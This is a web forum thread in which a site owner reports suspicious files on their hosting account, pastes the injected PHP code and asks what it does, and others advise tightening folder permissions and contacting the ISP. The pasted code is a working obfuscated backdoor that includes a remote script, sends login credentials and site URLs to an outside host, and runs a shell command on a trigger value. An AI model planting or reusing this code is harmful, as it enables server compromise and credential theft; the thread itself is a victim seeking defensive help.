General Community > Off-Topic

think ive been hacked

(1/2) > >>

mysticfreeman:
i really hope someone can help.. i think that i've been hacked but not sure.. on a certain day and time im finding files all over my sites (SMF forum section was the worst). Now the files are only appearing in sections where my folders are at 757 permissions, nowhere else and have random names that do no belong.. here are the contents:


--- Code: ---php -> error_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(!@include_once(base64_decode("aHR0cDovLw==")."hdihzzazbzggc".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}} <--

--- End code ---

its in php (i have removed the code prefixes. Could anyone please tell me what is happening in this code cos its the same in all the random files..

thanks

pcwacht:
Google finds : http://www.jaguarpc.com/forums/showthread.php?t=13305
and more hits : http://www.google.nl/search?hl=nl&q=include_once%28base64_decode%28%22aHR0cDovLw%3D%3D%22%29.%22&btnG=Google+zoeken&meta=

advice reduce to 757 to 755, notify isp
Good luck,
John

mysticfreeman:
thanks for that pcwacht and i would love to reduce to 755 but unfortunately if i do that i have no access to add/remove on any of my websites with WB :( from what i can gather its because im not the owner of the apache server or something.. its annoying

kweitzel:
--> ISP .. as soon as possible.

cheers

Klaus

mysticfreeman:
its definately a hack (thanks for the info pcwacht). I have notified my ISP and tbh i have no NO response from them and there hasnt been any reply or contact back with queries or anything.. very bad i think..

anyone recommend a really good host for WB sites and offering at least 100 addon domains?

thanks

Navigation

[0] Message Index

[#] Next page

Go to full version